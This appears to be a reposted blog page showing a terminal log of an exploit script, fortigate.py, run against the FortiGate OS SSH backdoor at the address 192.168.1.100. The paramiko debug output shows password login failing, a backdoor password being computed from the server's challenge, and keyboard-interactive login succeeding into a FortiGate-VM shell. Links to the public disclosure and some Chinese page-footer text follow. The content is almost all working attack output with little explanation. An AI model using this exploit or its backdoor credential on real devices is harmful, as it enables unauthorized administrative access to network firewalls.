root@Exploit-Fortigate-SSH-Backdoor:~# python fortigate.py 192.168.1.100
DEBUG:paramiko.transport:starting thread (client mode): 0xb6f81e0cL
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_1.16.0
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-vdPVN
INFO:paramiko.transport:Connected (version 2.0, client vdPVN)
DEBUG:paramiko.transport:kex algos:[u'diffie-hellman-group-exchange-sha1', u'diffie-hellman-group1-sha1'] server key:[u'ssh-rsa', u'ssh-dss'] client encrypt:[u'aes128-cbc', u'3des-cbc', u'blowfish-cbc', u'cast128-cbc', u'arcfour', u'aes192-cbc', u'aes256-cbc', u'rijndael-cbc@lysator.liu.se', u'aes128-ctr', u'aes192-ctr', u'aes256-ctr'] server encrypt:[u'aes128-cbc', u'3des-cbc', u'blowfish-cbc', u'cast128-cbc', u'arcfour', u'aes192-cbc', u'aes256-cbc', u'rijndael-cbc@lysator.liu.se', u'aes128-ctr', u'aes192-ctr', u'aes256-ctr'] client mac:[u'hmac-md5', u'hmac-sha1', u'hmac-ripemd160', u'hmac-ripemd160@openssh.com', u'hmac-sha1-96', u'hmac-md5-96'] server mac:[u'hmac-md5', u'hmac-sha1', u'hmac-ripemd160', u'hmac-ripemd160@openssh.com', u'hmac-sha1-96', u'hmac-md5-96'] client compress:[u'none', u'zlib'] server compress:[u'none', u'zlib'] client lang:[u''] server lang:[u''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-md5
DEBUG:paramiko.transport:Compression agreed: none
DEBUG:paramiko.transport:kex engine KexGroup1 specified hash_algo <built-in function openssl_sha1>
DEBUG:paramiko.transport:Switch to new keys ...
DEBUG:paramiko.transport:Adding ssh-rsa host key for 192.168.1.100: b65af08279339be6d9523fb6b291788f
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) failed.
[-] 192.168.1.100:22 - Authentication failed.
DEBUG:paramiko.transport:userauth is OK
[+] SSH prompt list: [(u'933293236', False)]
[+] SSH Backdoor Password: AK1AAAAAAAAAAAAAAAAclgUF/E9IkRVkMS3IxxYMVwd8Ws=
INFO:paramiko.transport:Authentication (keyboard-interactive) successful!
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 32768 bytes
DEBUG:paramiko.transport:Secsh channel 0 opened.
DEBUG:paramiko.transport:[chan 0] Sesch channel 0 request ok
DEBUG:paramiko.transport:[chan 0] Sesch channel 0 request ok
FortiGate-VM # References
http://seclists.org/fulldisclosure/2016/Jan/26
https://www.reddit.com/r/sysadmin/comments/40jmsr/full_disclosure_ssh_backdoor_for_fortigate_os/
https://www.reddit.com/r/netsec/comments/40lotk/ssh_backdoor_for_fortigate_os_version_4x_up_to/
http://www.mit.edu/afs.new/athena/system/i386_deb50/os-ubuntu-9.04/usr/share/python-support/python-paramiko/paramiko/transport.py
扫一扫
263
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
